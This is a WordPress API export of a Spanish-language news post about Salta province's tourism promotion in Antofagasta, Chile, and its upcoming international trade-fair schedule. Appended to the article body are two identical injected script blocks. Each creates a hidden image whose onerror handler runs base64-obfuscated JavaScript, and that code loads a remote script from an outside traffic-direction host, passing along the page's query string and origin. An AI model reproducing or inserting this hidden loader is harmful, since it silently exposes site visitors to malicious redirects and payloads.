{"id":1427,"date":"2022-09-05T23:17:32","date_gmt":"2022-09-06T02:17:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1427"},"modified":"2025-08-14T00:36:25","modified_gmt":"2025-08-14T03:36:25","slug":"el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1427","title":{"rendered":"El Gobierno realiza acciones de promoci\u00f3n tur\u00edstica en mercados internacionales estrat\u00e9gicos"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#860303\"><em>La misi\u00f3n comercial concretada en Antofagasta, Chile, incluy\u00f3 acciones de promoci\u00f3n y difusi\u00f3n del destino Salta dirigidas a consumidores finales y referentes del sector p\u00fablico y privado.<\/em><\/h3>\n\n\n\n<p>La promoci\u00f3n tur\u00edstica del destino Salta contin\u00faa despleg\u00e1ndose en diferentes puntos de inter\u00e9s estrat\u00e9gicos para la provincia, en esta oportunidad la misi\u00f3n comercial se llev\u00f3 a cabo en la ciudad chilena de Antofagasta.<\/p>\n\n\n\n<p>El Ministerio de Turismo a trav\u00e9s del equipo del Instituto de Promoci\u00f3n Tur\u00edstica de la Provincia de Salta (INPROTUR) realiz\u00f3 en el vecino pa\u00eds una serie de acciones orientadas al consumidor final y tambi\u00e9n encuentros comerciales con empresarios, asociaciones y c\u00e1maras del sector tur\u00edstico con el objetivo de aumentar la llegada de turistas de esta regi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3995-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3995-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg\" alt=\"El Gobierno realiza acciones de promoci\u00f3n tur\u00edstica en mercados internacionales estrat\u00e9gicos\"\/><\/a><\/figure>\n\n\n\n<p>La agenda incluy\u00f3 presentaciones en puntos de gran afluencia de p\u00fablico como la Plaza Col\u00f3n y la peatonal antofagastina, all\u00ed se entreg\u00f3 folleter\u00eda informativa y se inform\u00f3 al p\u00fablico sobre la amplia oferta de productos y servicios tur\u00edsticos que Salta ofrece a sus visitantes.<\/p>\n\n\n\n<p>Por otro lado, autoridades locales, agentes de viajes y medios de comunicaci\u00f3n fueron recibidos por la presidenta del INPROTUR&nbsp;<strong>Manuela Arancibia<\/strong>, en el evento \u201cLa Noche de Salta\u201d donde los presentes pudieron conocer a fondo la oferta y disfrutar de una t\u00edpica pe\u00f1a salte\u00f1a.<\/p>\n\n\n\n<p>\u201cNuestros principales prop\u00f3sitos son &nbsp;difundir, promocionar el destino y fomentar los lazos de cooperaci\u00f3n que estimulen la inversi\u00f3n extranjera directa en nuestra provincia\u201d, coment\u00f3 Manuela Arancibia.<\/p>\n\n\n\n<p>En la agenda institucional, la presidenta del Inprotur mantuvo un encuentro con el gobernador de la Regi\u00f3n de Antofagasta,&nbsp;<strong>Ricardo D\u00edaz Cort\u00e9s<\/strong>. Tambi\u00e9n con representantes del sector privado entre los que se encontraba Rub\u00e9n Ormazabal director de la C\u00e1mara de Comercio y Turismo.<\/p>\n\n\n\n<p>Acompa\u00f1aron las acciones de promoci\u00f3n de Salta,&nbsp;<strong>Jonathan Vel\u00e1squez Ram\u00edrez<\/strong>&nbsp;alcalde de Antofagasta,&nbsp;<strong>Mar\u00eda Teresa Veliz Seremi&nbsp;<\/strong>de Econom\u00eda,&nbsp;<strong>Claudio Jerez&nbsp;<\/strong>director del SERNATUR Antofagasta,&nbsp;<strong>Hern\u00e1n Vargas<\/strong>&nbsp;presidente de la C\u00e1mara de Turismo de Antofagasta y&nbsp;<strong>Mar\u00eda Mujica<\/strong>&nbsp;c\u00f3nsul de Argentina en Antofagasta.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large is-style-rounded\"><img fetchpriority=\"high\" decoding=\"async\" width=\"800\" height=\"600\" data-id=\"1428\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg\" alt=\"\" class=\"wp-image-1428\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-300x225.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-768x576.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-696x522.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-560x420.jpeg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-80x60.jpeg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3997-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-265x198.jpeg 265w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-style-rounded\"><img decoding=\"async\" width=\"855\" height=\"600\" data-id=\"1430\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg\" alt=\"\" class=\"wp-image-1430\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg 855w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-300x211.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-768x539.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-696x488.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-599x420.jpeg 599w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/3996-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-100x70.jpeg 100w\" sizes=\"(max-width: 855px) 100vw, 855px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><strong>Calendario de promoci\u00f3n internacional<\/strong><\/p>\n\n\n\n<p>El equipo de promoci\u00f3n tur\u00edstica internacional tiene programado para los pr\u00f3ximos meses un calendario de acciones en mercados estrat\u00e9gicos iniciando desde el 16 de este mes en la ExpoCruz (Bolivia)<\/p>\n\n\n\n<p>El 20 de septiembre ser\u00e1 el turno de la feria ABAV en San Pablo, Brasil; En el mercado latinoamericano el 3 de noviembre habr\u00e1 presencia de promoci\u00f3n en Gramado (Brasil); el 11 del mismo mes en FITPAR, Asunci\u00f3n de Paraguay; entre el 30 de noviembre y el 2 de diciembre Salta estar\u00e1 presente en Foz Do Igua\u00e7u.<\/p>\n\n\n\n<figure class=\"wp-block-image is-style-rounded\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3998-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3998-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos.jpeg\" alt=\"El Gobierno realiza acciones de promoci\u00f3n tur\u00edstica en mercados internacionales estrat\u00e9gicos\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image is-style-rounded\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3999-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-20220905142534.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3999-el-gobierno-realiza-acciones-de-promocion-turistica-en-mercados-internacionales-estrategicos-20220905142534.jpeg\" alt=\"El Gobierno realiza acciones de promoci\u00f3n tur\u00edstica en mercados internacionales estrat\u00e9gicos\"\/><\/a><\/figure>\n\n\n\n<p>El destino Salta estar\u00e1 presente en las principales ferias del mercado europeo: el 20 de septiembre es el turno de IFTM TOP RESA en Par\u00eds (Francia) ; el 12 de octubre en TTG Travel Experience en RImini, Italia; el 7 de noviembre en WTM World Travel Market (Reino Unido) ; el 11 del mismo mes ser\u00e1 el turno de IBTM Barcelona, Espa\u00f1a.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La misi\u00f3n comercial concretada en Antofagasta, Chile, incluy\u00f3 acciones de promoci\u00f3n y difusi\u00f3n del destino Salta dirigidas a consumidores finales y referentes del sector p\u00fablico y privado. La promoci\u00f3n tur\u00edstica del destino Salta contin\u00faa despleg\u00e1ndose en diferentes puntos de inter\u00e9s estrat\u00e9gicos para la provincia, en esta oportunidad la misi\u00f3n comercial se llev\u00f3 a cabo en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1431,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-1427","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1427"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1427"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1427\/revisions"}],"predecessor-version":[{"id":7364,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1427\/revisions\/7364"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1431"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1427"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}